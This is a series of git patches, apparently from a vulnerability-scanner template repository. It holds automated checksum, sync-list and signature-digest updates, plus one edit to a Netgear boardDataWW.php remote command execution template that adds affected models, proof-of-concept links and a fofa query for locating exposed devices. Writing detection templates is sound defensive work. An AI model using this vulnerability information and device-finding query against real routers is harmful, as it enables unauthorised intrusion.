http/misconfiguration/installer/joomla-installer.yaml:3c61ec0cf21b65088e1392f2f5ce5cbed4bfb17a +http/misconfiguration/installer/justfans-installer.yaml:ec7eee3a958238dc8416b8311a97218ac5dc2a23 http/misconfiguration/installer/klr300n-installer.yaml:417ba88bb2ce1a6aced0dfacfa77021a62f73487 http/misconfiguration/installer/knowledgetree-installer.yaml:f4e36b69f4f577a4a5b76c60fd0ce3f47b33fe27 http/misconfiguration/installer/limesurvey-installer.yaml:8c8e0b95f4dbcb24a9da331230c2cb9333bf0e0b @@ -5472,7 +5475,7 @@ http/misconfiguration/installer/nodebb-installer.yaml:ed1f90625817f7ea87343d84d7 http/misconfiguration/installer/nopcommerce-installer.yaml:bfd555e9315506be53f26705388e2c20e2459d8a http/misconfiguration/installer/octoprint-installer.yaml:71f945261262e651c1349fcf4912d78330ed427e http/misconfiguration/installer/ojs-installer.yaml:9db5a6615b0a8adb210daea73705dac97b071006 -http/misconfiguration/installer/onlyoffice-installer.yaml:99ef19f5fdfb28ae627eaba3740df383b80b0550 +http/misconfiguration/installer/onlyoffice-installer.yaml:ee793f59fa6a84e9513907be49bd0a0944db1bfe http/misconfiguration/installer/openemr-setup-installer.yaml:3492aff559423b20f44da10634d6bbf53a426871 http/misconfiguration/installer/openfire-setup.yaml:a297d11c8460758d07481671287ba0d2e41026d0 http/misconfiguration/installer/openmage-install.yaml:180e538959d9ad22f7f6c64648e8d392383334bc @@ -5494,7 +5497,7 @@ http/misconfiguration/installer/pmm-installer.yaml:32509e9fe33719aacf310d33d0a40 http/misconfiguration/installer/posteio-installer.yaml:d4662ebf401e1c2128570f674b63ccf25970599b http/misconfiguration/installer/prestashop-installer.yaml:5011384078f8708b8ec90caa52c299ecb922dea5 http/misconfiguration/installer/processwire-installer.yaml:77810f7d222228fb1c1afb38560135f4b7718d24 -http/misconfiguration/installer/profittrailer-installer.yaml:234e41ef679963500411241f83a84f9f8f9facc5 +http/misconfiguration/installer/profittrailer-installer.yaml:7400afd0fc1552d5fc6e5dc1808e05294d9fe119 http/misconfiguration/installer/projectsend-installer.yaml:aa78d14c8384bd5355f0d504c5d73032eef9cc80 http/misconfiguration/installer/qloapps-installer.yaml:4cd9381f76856e1537af119a837b6e303bc97217 http/misconfiguration/installer/redash-installer.yaml:1087870f7e1826761d0ecbfbbc60528e43e028e0 @@ -5526,7 +5529,7 @@ http/misconfiguration/installer/unifi-wizard-install.yaml:e7bd820e772c8d6c4b72b9 http/misconfiguration/installer/uvdesk-helpdesk-installer.yaml:9100af130cdecc1b9e7ac7c7201684997e51a037 http/misconfiguration/installer/uvdesk-install.yaml:e09e2da072d150ee5a8ad20f68a16d026cd20837 http/misconfiguration/installer/vironeer-installer.yaml:bbb96915ddb6312c37d73639468ac9454873e277 -http/misconfiguration/installer/virtual-smartzone-installer.yaml:eb1595d8a2e010eb1afea3ce0c3469ddb2236066 +http/misconfiguration/installer/virtual-smartzone-installer.yaml:f8179584291b98fb14ac863562c3392d99276652 http/misconfiguration/installer/vtiger-installer.yaml:0db9526b5e94e1948f72d13820bb49a346afee5c http/misconfiguration/installer/webasyst-installer.yaml:89e08267f8e97215dcf80f338c6812b515033579 http/misconfiguration/installer/webcalendar-install.yaml:030798e0e2618533f5a0f1492cfed7d9558cde7f @@ -8592,7 +8595,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:e63cdb2330891dc01a81e7bbef7753c3694aa57a +templates-checksum.txt:5753cfeaef6359ce183d1ea0a77ceceb145bc3be wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 8d58dd86377befbac8a8013741db70f73f1f5a7e Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 29 May 2024 08:03:24 +0000 Subject: [PATCH 428/847] Syncing Templates --- .github/workflows/templates-sync.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 95fe545e9c..14de1e5d08 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -28,10 +28,12 @@ on: - 'http/misconfiguration/installer/invicti-enterprise-installer.yaml' - 'http/misconfiguration/installer/invoice-ninja-installer.yaml' - 'http/misconfiguration/installer/jfa-go-installer.yaml' + - 'http/misconfiguration/installer/justfans-installer.yaml' - 'http/misconfiguration/installer/onlyoffice-installer.yaml' - 'http/misconfiguration/installer/openemr-setup-installer.yaml' - 'http/misconfiguration/installer/profittrailer-installer.yaml' - 'http/misconfiguration/installer/projectsend-installer.yaml' + - 'http/misconfiguration/installer/snipe-it-installer.yaml' - 'http/misconfiguration/installer/stackposts-installer.yaml' - 'http/misconfiguration/installer/tastyigniter-installer.yaml' - 'http/misconfiguration/installer/uvdesk-helpdesk-installer.yaml' From 850fd82b162b88480b6b67043cabe0c650570077 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 29 May 2024 08:03:27 +0000 Subject: [PATCH 429/847] Auto Generated New Template Addition List [Wed May 29 08:03:27 UTC 2024] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index 8b4a34a472..43681df415 100644 --- a/.new-additions +++ b/.new-additions @@ -24,6 +24,7 @@ http/misconfiguration/installer/invicti-enterprise-installer.yaml http/misconfiguration/installer/invoice-ninja-installer.yaml http/misconfiguration/installer/jfa-go-installer.yaml http/misconfiguration/installer/justfans-installer.yaml +http/misconfiguration/installer/librenms-installer.yaml http/misconfiguration/installer/onlyoffice-installer.yaml http/misconfiguration/installer/openemr-setup-installer.yaml http/misconfiguration/installer/profittrailer-installer.yaml @@ -31,6 +32,7 @@ http/misconfiguration/installer/projectsend-installer.yaml http/misconfiguration/installer/snipe-it-installer.yaml http/misconfiguration/installer/stackposts-installer.yaml http/misconfiguration/installer/tastyigniter-installer.yaml +http/misconfiguration/installer/ubersmith-installer.yaml http/misconfiguration/installer/uvdesk-helpdesk-installer.yaml http/misconfiguration/installer/virtual-smartzone-installer.yaml http/technologies/gotweb-detect.yaml From e129630975f56c73927fe8711e1e09849d3bd725 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 29 May 2024 08:03:35 +0000 Subject: [PATCH 430/847] Auto Generated Templates Checksum [Wed May 29 08:03:35 UTC 2024] :robot: --- templates-checksum.txt | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index ae73330b0c..e4ddd91daf 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -5510,6 +5510,7 @@ http/misconfiguration/installer/shopify-app-installer.yaml:2181b56f2923103189ec1 http/misconfiguration/installer/shopware-installer.yaml:4c79ee2e79e426b2083cdc6465b55e54444f8fab http/misconfiguration/installer/smf-installer.yaml:8a1dc0aa144a9dcc21e28700824d31defe69ccc9 http/misconfiguration/installer/sms-installer.yaml:c9d601c3fcdab053214228580512c01923e6aeb3 +http/misconfiguration/installer/snipe-it-installer.yaml:d344b83caa3a3823c89653eee76405375aa9527b http/misconfiguration/installer/spa-cart-installer.yaml:49531886b7f6388b490c27462a4d305bb3b2f093 http/misconfiguration/installer/spip-install.yaml:14a25f5be35d80683649fcac189993c8c514ee23 http/misconfiguration/installer/stackposts-installer.yaml:29af347900e7b1f9fd77a04fe02dfbf89020028f @@ -5524,6 +5525,7 @@ http/misconfiguration/installer/tiny-rss-installer.yaml:fffe28f654914f0e91b3afe7 http/misconfiguration/installer/trilium-notes-installer.yaml:c3bc11c9c011dd659ca6af6d6ddbf4907495d69e http/misconfiguration/installer/turbo-website-installer.yaml:c860118d4335fffd299c32c8ccfd503ece02fd94 http/misconfiguration/installer/typo3-installer.yaml:316fc6ce687dbbdde1d1fe5bbff8b7224c7ed4d1 +http/misconfiguration/installer/ubersmith-installer.yaml:301fd89b0899f53334a28e3434c2b14ba2df9ae5 http/misconfiguration/installer/umbraco-installer.yaml:468d300c5078cf4f972eabf51e9452bcdc8ffbb4 http/misconfiguration/installer/unifi-wizard-install.yaml:e7bd820e772c8d6c4b72b9fc69809ef8561d251e http/misconfiguration/installer/uvdesk-helpdesk-installer.yaml:9100af130cdecc1b9e7ac7c7201684997e51a037 @@ -8595,7 +8597,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:5753cfeaef6359ce183d1ea0a77ceceb145bc3be +templates-checksum.txt:c5c5920cb3e415a9dc318b40e8843abce8dec5ce wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 604fba3a9b3736e43516e17876540d21fa398669 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 29 May 2024 08:04:16 +0000 Subject: [PATCH 432/847] Syncing Templates --- .github/workflows/templates-sync.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 14de1e5d08..3305d463d8 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -29,6 +29,7 @@ on: - 'http/misconfiguration/installer/invoice-ninja-installer.yaml' - 'http/misconfiguration/installer/jfa-go-installer.yaml' - 'http/misconfiguration/installer/justfans-installer.yaml' + - 'http/misconfiguration/installer/librenms-installer.yaml' - 'http/misconfiguration/installer/onlyoffice-installer.yaml' - 'http/misconfiguration/installer/openemr-setup-installer.yaml' - 'http/misconfiguration/installer/profittrailer-installer.yaml' @@ -36,6 +37,7 @@ on: - 'http/misconfiguration/installer/snipe-it-installer.yaml' - 'http/misconfiguration/installer/stackposts-installer.yaml' - 'http/misconfiguration/installer/tastyigniter-installer.yaml' + - 'http/misconfiguration/installer/ubersmith-installer.yaml' - 'http/misconfiguration/installer/uvdesk-helpdesk-installer.yaml' - 'http/misconfiguration/installer/virtual-smartzone-installer.yaml' - 'http/technologies/gotweb-detect.yaml' From 3283a9c36198c7b80f3c8785469a73321430e0bc Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 29 May 2024 08:04:25 +0000 Subject: [PATCH 433/847] Auto Template Signing [Wed May 29 08:04:25 UTC 2024] :robot: --- http/misconfiguration/installer/ejbca-enterprise-installer.yaml | 1 + .../misconfiguration/installer/invicti-enterprise-installer.yaml | 1 + http/misconfiguration/installer/invoice-ninja-installer.yaml | 1 + http/misconfiguration/installer/jfa-go-installer.yaml | 1 + http/misconfiguration/installer/justfans-installer.yaml | 1 + http/misconfiguration/installer/tastyigniter-installer.yaml | 1 + http/misconfiguration/installer/uvdesk-helpdesk-installer.yaml | 1 + 7 files changed, 7 insertions(+) diff --git a/http/misconfiguration/installer/ejbca-enterprise-installer.yaml b/http/misconfiguration/installer/ejbca-enterprise-installer.yaml index 149bfaba41..e0d89207e3 100644 --- a/http/misconfiguration/installer/ejbca-enterprise-installer.yaml +++ b/http/misconfiguration/installer/ejbca-enterprise-installer.yaml @@ -29,3 +29,4 @@ http: - type: status status: - 200 +# digest: 4b0a00483046022100a2e706b8c94579f157f9d6c9567084d9efca7244efa710bd8a17185c2b787fd1022100bee3f9d99ebd4795e3e2730e34f0d70ccac6eb051b20a36d894cd36e401f5b4b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/invicti-enterprise-installer.yaml b/http/misconfiguration/installer/invicti-enterprise-installer.yaml index 97b5fd79e7..df60f23db4 100644 --- a/http/misconfiguration/installer/invicti-enterprise-installer.yaml +++ b/http/misconfiguration/installer/invicti-enterprise-installer.yaml @@ -29,3 +29,4 @@ http: - type: status status: - 200 +# digest: 4a0a00473045022100c9cbc9675e67389c9b71a1a4798202fde92a29809bcbaa633b62cc1f8d312a50022008ab9b41933532eb6fb1fb8033636cd2c0f6a1924648e93ee9e8bed00549c7c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/invoice-ninja-installer.yaml b/http/misconfiguration/installer/invoice-ninja-installer.yaml index 93c12f260b..61fd5b6a50 100644 --- a/http/misconfiguration/installer/invoice-ninja-installer.yaml +++ b/http/misconfiguration/installer/invoice-ninja-installer.yaml @@ -29,3 +29,4 @@ http: - type: status status: - 200 +# digest: 4a0a0047304502206e0d927418f5a6789e48f8b427edda11664ba45a9e6ac0dc19855c1f2afb388a022100a692a70a5192fe68f64f8ee34e21c62d742439864429f382a5ea47c4094cefc2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/jfa-go-installer.yaml b/http/misconfiguration/installer/jfa-go-installer.yaml index 5909fa7972..647e5da44c 100644 --- a/http/misconfiguration/installer/jfa-go-installer.yaml +++ b/http/misconfiguration/installer/jfa-go-installer.yaml @@ -29,3 +29,4 @@ http: - type: status status: - 200 +# digest: 490a0046304402205300e59818b7ace97d3c1b501b38973f73646a3839f479d2512f92b67eafbcd102203b603e8822a95f3e708d544c2374a684cb435a6a9bf83e2a0988534ad85fbe0d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/justfans-installer.yaml b/http/misconfiguration/installer/justfans-installer.yaml index 14ec8c2232..4e671b2323 100644 --- a/http/misconfiguration/installer/justfans-installer.yaml +++ b/http/misconfiguration/installer/justfans-installer.yaml @@ -29,3 +29,4 @@ http: - type: status status: - 200 +# digest: 4a0a00473045022100cfe023f042a72cda1b9e1ba395709391e57065de197d94979496d3cbd7e4fd360220065040ae36e9b95659abf63d8247b69fcd2dfad6241d7857938e0c50c4855332:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/tastyigniter-installer.yaml b/http/misconfiguration/installer/tastyigniter-installer.yaml index a455d46fd5..adb01864c8 100644 --- a/http/misconfiguration/installer/tastyigniter-installer.yaml +++ b/http/misconfiguration/installer/tastyigniter-installer.yaml @@ -29,3 +29,4 @@ http: - type: status status: - 200 +# digest: 490a00463044022039e2c4807f395e7435256b8058fadc16da77b4dff33061231baa9c4437b7cdf502203554057a981d56294d48f2244347267d8a5a8c677743a75ca434209388fd7ce6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/uvdesk-helpdesk-installer.yaml b/http/misconfiguration/installer/uvdesk-helpdesk-installer.yaml index 2a4069893e..ec5c10f11c 100644 --- a/http/misconfiguration/installer/uvdesk-helpdesk-installer.yaml +++ b/http/misconfiguration/installer/uvdesk-helpdesk-installer.yaml @@ -29,3 +29,4 @@ http: - type: status status: - 200 +# digest: 490a00463044022030bc57b2bcb53760cbfc4d1d17bb419d39f3ccbe4c9873db930826271b4f183a02201b400def9b87893db012ede33e77d6686a3a1a7c528ed9d7d8f6b3578ffce359:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 71501e19f03c13e382d80b89b41ed23be76449e0 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 29 May 2024 08:11:01 +0000 Subject: [PATCH 434/847] Auto Generated New Template Addition List [Wed May 29 08:11:01 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 43681df415..8314acb106 100644 --- a/.new-additions +++ b/.new-additions @@ -12,6 +12,7 @@ http/default-logins/cambium-networks/cambium-networks-default-login.yaml http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml http/exposed-panels/busybox-repository-browser.yaml http/exposed-panels/cisco-firepower-panel.yaml +http/exposed-panels/fortinet/fortisiem-panel.yaml http/exposed-panels/vrealize-hyperic-login-panel.yaml http/exposures/tokens/wechat/wechat-secret-key.yaml http/misconfiguration/installer/activecollab-installer.yaml From f53fc1d8afeb8b2cd13f5e8d9c677d8d8666488f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 29 May 2024 08:11:20 +0000 Subject: [PATCH 435/847] Auto Generated Templates Checksum [Wed May 29 08:11:20 UTC 2024] :robot: --- templates-checksum.txt | 19 ++++++++++--------- 1 file changed, 10 insertions(+), 9 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index e4ddd91daf..a5ebc69c09 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3853,7 +3853,7 @@ http/exposed-panels/fortinet/fortinet-panel.yaml:f1798cfb14f2f54edc3d6746a402d17 http/exposed-panels/fortinet/fortios-management-panel.yaml:c7c0c4b9eed1b1a4546c3655439186718078d591 http/exposed-panels/fortinet/fortios-panel.yaml:d7766874f165089c3e1539b84d46d46984c52ae5 http/exposed-panels/fortinet/fortitester-login-panel.yaml:e366bffb4008cbd19a32a104d93251a042fdcbbf -http/exposed-panels/fortinet/fortiweb-panel.yaml:2e28730c4c47885d411f63ad31871e3d6253ca01 +http/exposed-panels/fortinet/fortiweb-panel.yaml:6893382e70ed550bd9f342d6e24e3a41ec921165 http/exposed-panels/fortinet/fortiwlm-panel.yaml:3260c3235302198e0168fba0ed389bc474ddfbd5 http/exposed-panels/freeipa-panel.yaml:0068757bb30eded3c0d933ee11d417e1800a854d http/exposed-panels/freepbx-administration-panel.yaml:3c250e83cf97aa3ef95b1c881b173a79e8cc7876 @@ -5425,7 +5425,7 @@ http/misconfiguration/installer/dolphin-installer.yaml:66ccbdc0d810c8fb5876d46e8 http/misconfiguration/installer/drupal-install.yaml:afa701be86d508093f72f596b7381ed76abd7c36 http/misconfiguration/installer/easy-viserlabs-installer.yaml:7ddea4c605e0c2129861c43f62aa0988f8883b51 http/misconfiguration/installer/easyscripts-installer.yaml:4cb8db53f08ed1bf8172866766c33878f579fda9 -http/misconfiguration/installer/ejbca-enterprise-installer.yaml:c7a7e5fcbedd43a6ca347ae9acba4579fdb1ed24 +http/misconfiguration/installer/ejbca-enterprise-installer.yaml:b44ca7bfe9568e4ff18fc5557d3363de848f5a67 http/misconfiguration/installer/eshop-installer.yaml:c83244265e0cd9499cee6ecfd6fda805b6475251 http/misconfiguration/installer/espeasy-installer.yaml:051a8d1869f34a42c6d6a287ff2668c3b07c2b99 http/misconfiguration/installer/espocrm-installer.yaml:fccc8f34a7a3101fe1171472726b160881408b3a @@ -5446,14 +5446,15 @@ http/misconfiguration/installer/ids-skills-installer.yaml:ff7fee92596ae2212f48a0 http/misconfiguration/installer/impresspages-installer.yaml:a202181818bcfe8005a744f81027dc06de05dc40 http/misconfiguration/installer/imprivata-installer.yaml:876cea672f3efc0085a779a6d8c9305c994a2ea3 http/misconfiguration/installer/indegy-sensor-installer.yaml:deaa2d09c184bd9eee230c651699d1f1ccc8afcc -http/misconfiguration/installer/invicti-enterprise-installer.yaml:51eab6643b190341bccd5bfb787b27bfcbf36e71 -http/misconfiguration/installer/invoice-ninja-installer.yaml:1cc5ec76b7ec954a5a2a707c2e558ecff5f018ba -http/misconfiguration/installer/jfa-go-installer.yaml:55a1d406199affc4050e2691de8a844ed5828791 +http/misconfiguration/installer/invicti-enterprise-installer.yaml:b6dcb44bccfb0d5e8e5e93c2064366465bc7445b +http/misconfiguration/installer/invoice-ninja-installer.yaml:a47676cd18944ae6d03c57d2fb62202a052668ad +http/misconfiguration/installer/jfa-go-installer.yaml:91fbc04a3dac28f1b0607e93ad891a6b9fd0257f http/misconfiguration/installer/jira-setup.yaml:dd2b7c8705de134a0832d31e71627a28afd37e14 http/misconfiguration/installer/joomla-installer.yaml:3c61ec0cf21b65088e1392f2f5ce5cbed4bfb17a -http/misconfiguration/installer/justfans-installer.yaml:ec7eee3a958238dc8416b8311a97218ac5dc2a23 +http/misconfiguration/installer/justfans-installer.yaml:a0589926d5a3ca938dd300000c6e260ba8ffe7f2 http/misconfiguration/installer/klr300n-installer.yaml:417ba88bb2ce1a6aced0dfacfa77021a62f73487 http/misconfiguration/installer/knowledgetree-installer.yaml:f4e36b69f4f577a4a5b76c60fd0ce3f47b33fe27 +http/misconfiguration/installer/librenms-installer.yaml:333655623dee73fdc147ce0e6b93ff5035b30743 http/misconfiguration/installer/limesurvey-installer.yaml:8c8e0b95f4dbcb24a9da331230c2cb9333bf0e0b http/misconfiguration/installer/lmszai-installer.yaml:afa8a8a67c2b987480677086d4d970b59fc1d35f http/misconfiguration/installer/lychee-installer.yaml:62abd9489fe78e56935daee247bf8314e1bd279e @@ -5518,7 +5519,7 @@ http/misconfiguration/installer/sugarcrm-install.yaml:a253a2bb6995ab8232ce780dcf http/misconfiguration/installer/suitecrm-installer.yaml:0c39360372f4dd838d49b82ba353aecb8a6d6b3b http/misconfiguration/installer/sumowebtools-installer.yaml:fd2852a171b68f3b8f5290b80da4c84daa1afbcc http/misconfiguration/installer/tasmota-install.yaml:f77cc6de67828f45e5d0e528f773aa565679bd65 -http/misconfiguration/installer/tastyigniter-installer.yaml:24ae629a775107fe9bcc658e1377f483f864c4a9 +http/misconfiguration/installer/tastyigniter-installer.yaml:e7cb6e7f2260190535a8d2de4b5eda98a819dafc http/misconfiguration/installer/tautulli-install.yaml:babc01a81e184ecadb2cc433e7b0cdcc1195eb8b http/misconfiguration/installer/testrail-install.yaml:ffd3e6d389e273255f6e6b97ef617680c3336895 http/misconfiguration/installer/tiny-rss-installer.yaml:fffe28f654914f0e91b3afe7aeecd942d1fb1705 @@ -5528,7 +5529,7 @@ http/misconfiguration/installer/typo3-installer.yaml:316fc6ce687dbbdde1d1fe5bbff http/misconfiguration/installer/ubersmith-installer.yaml:301fd89b0899f53334a28e3434c2b14ba2df9ae5 http/misconfiguration/installer/umbraco-installer.yaml:468d300c5078cf4f972eabf51e9452bcdc8ffbb4 http/misconfiguration/installer/unifi-wizard-install.yaml:e7bd820e772c8d6c4b72b9fc69809ef8561d251e -http/misconfiguration/installer/uvdesk-helpdesk-installer.yaml:9100af130cdecc1b9e7ac7c7201684997e51a037 +http/misconfiguration/installer/uvdesk-helpdesk-installer.yaml:8d8e12dccb52a4754d1c1ac579401f21a4c6913b http/misconfiguration/installer/uvdesk-install.yaml:e09e2da072d150ee5a8ad20f68a16d026cd20837 http/misconfiguration/installer/vironeer-installer.yaml:bbb96915ddb6312c37d73639468ac9454873e277 http/misconfiguration/installer/virtual-smartzone-installer.yaml:f8179584291b98fb14ac863562c3392d99276652 @@ -8597,7 +8598,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:c5c5920cb3e415a9dc318b40e8843abce8dec5ce +templates-checksum.txt:5f3494f76751f8b9761a306f97ff83ba1dcda1d0 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 066764a6627f571e5d98bab29de942377f039ee9 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 29 May 2024 08:11:37 +0000 Subject: [PATCH 436/847] Auto Generated New Template Addition List [Wed May 29 08:11:36 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 8314acb106..d53ff6a0fd 100644 --- a/.new-additions +++ b/.new-additions @@ -12,6 +12,7 @@ http/default-logins/cambium-networks/cambium-networks-default-login.yaml http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml http/exposed-panels/busybox-repository-browser.yaml http/exposed-panels/cisco-firepower-panel.yaml +http/exposed-panels/digital-watchdog-panel.yaml http/exposed-panels/fortinet/fortisiem-panel.yaml http/exposed-panels/vrealize-hyperic-login-panel.yaml http/exposures/tokens/wechat/wechat-secret-key.yaml From 6af675ecab3402e25fbf6a2fd6d9069b544af0d6 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 29 May 2024 08:11:50 +0000 Subject: [PATCH 437/847] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 3305d463d8..5050b10a5a 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -17,6 +17,7 @@ on: - 'http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml' - 'http/exposed-panels/busybox-repository-browser.yaml' - 'http/exposed-panels/cisco-firepower-panel.yaml' + - 'http/exposed-panels/fortinet/fortisiem-panel.yaml' - 'http/exposed-panels/vrealize-hyperic-login-panel.yaml' - 'http/exposures/tokens/wechat/wechat-secret-key.yaml' - 'http/misconfiguration/installer/activecollab-installer.yaml' From 051002ec78e6aca5dad8df6734dbf74ea895785c Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 29 May 2024 13:43:14 +0530 Subject: [PATCH 438/847] minor update --- http/iot/netgear-boarddataww-rce.yaml | 9 ++++++--- 1 file changed, 6 insertions(+), 3 deletions(-) diff --git a/http/iot/netgear-boarddataww-rce.yaml b/http/iot/netgear-boarddataww-rce.yaml index 56d5921e84..7609c7043a 100644 --- a/http/iot/netgear-boarddataww-rce.yaml +++ b/http/iot/netgear-boarddataww-rce.yaml @@ -1,15 +1,18 @@ id: netgear-boarddataww-rce info: - name: Netgear router boardDataWW.php - Remote Code Execution + name: Netgear Devices boardDataWW.php Unauthenticated Remote Command Execution author: pussycat0x - severity: high + severity: critical description: | - There is an RCE vulnerability in boardDataWW.php of this product. Malicious attackers may use this vulnerability to execute malicious commands, eventually causing the server to crash. + boardDataWW.php in Netgear WN604 before 3.3.3 and WN802Tv2, WNAP210v2, WNAP320, WNDAP350, WNDAP360, and WNDAP660 before 3.5.5.0 allow remote attackers to execute arbitrary commands. reference: - https://github.com/wy876/POC/blob/main/Netgear%E8%B7%AF%E7%94%B1%E5%99%A8boardDataWW.php%E5%AD%98%E5%9C%A8RCE%E6%BC%8F%E6%B4%9E.md + - https://github.com/gobysec/GobyVuls/blob/master/Netgear_Devices_boardDataWW.php_Unauthenticated_Remote_Command_Execution.md metadata: fofa-query: title=="Netgear" + verified: true + max-request: 1 tags: rce,netgear,iot http: From 036f51525defe2a84539a50c021c2acd1f8ea2d3 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 29 May 2024 08:13:17 +0000 Subject: [PATCH 439/847] Auto Template Signing [Wed May 29 08:13:17 UTC 2024] :robot: --- http/exposed-panels/fortinet/fortisiem-panel.yaml | 1 + http/exposed-panels/fortinet/fortiweb-panel.yaml | 2 +- http/misconfiguration/installer/librenms-installer.yaml | 1 + http/misconfiguration/installer/snipe-it-installer.yaml | 1 + http/misconfiguration/installer/ubersmith-installer.yaml | 1 + 5 files changed, 5 insertions(+), 1 deletion(-) diff --git a/http/exposed-panels/fortinet/fortisiem-panel.yaml b/http/exposed-panels/fortinet/fortisiem-panel.yaml index 2bbb829426..bfa0541c28 100644 --- a/http/exposed-panels/fortinet/fortisiem-panel.yaml +++ b/http/exposed-panels/fortinet/fortisiem-panel.yaml @@ -32,3 +32,4 @@ http: - type: word words: - "fortiSIEM_current_login_salt" +# digest: 4b0a004830460221008a6a772c3fffde8fd5b541e366e20e6b81a4011deaf15fa077582db848d2c813022100fb2379020323dd1ef0c99d77e5087cc52deb84d65e814c6701363586ed883756:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/fortinet/fortiweb-panel.yaml b/http/exposed-panels/fortinet/fortiweb-panel.yaml index 76942ae247..38cb069229 100644 --- a/http/exposed-panels/fortinet/fortiweb-panel.yaml +++ b/http/exposed-panels/fortinet/fortiweb-panel.yaml @@ -33,4 +33,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100903d0b01156fa0e1e1e76dbcc24d8cb562c86a57525a5d88ec5c675f4331fdd3022100b5f3290d941b6e6afd66f7a09b92b23651f4abce54ef8f8a365920e23746cd81:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022041fe6af3ec8275528e99ab5d5a507ebf026da3333ded6112955b3bc8be63b5cc02202908a0bbf12ad0bcf706162700aaa732b9aeebecd13227b915076e9e53cbe495:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/librenms-installer.yaml b/http/misconfiguration/installer/librenms-installer.yaml index 07e0c9cbf8..acc04bf806 100644 --- a/http/misconfiguration/installer/librenms-installer.yaml +++ b/http/misconfiguration/installer/librenms-installer.yaml @@ -29,3 +29,4 @@ http: - type: status status: - 200 +# digest: 4a0a00473045022100e9b5592a53be643246e6e5bee43973a44e97ff6e655d49fb6c8b4619de4823bd02205422d2733a061db4c85e518eaa773ef081286379248d0bf8e0a3b12ada08e8c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/snipe-it-installer.yaml 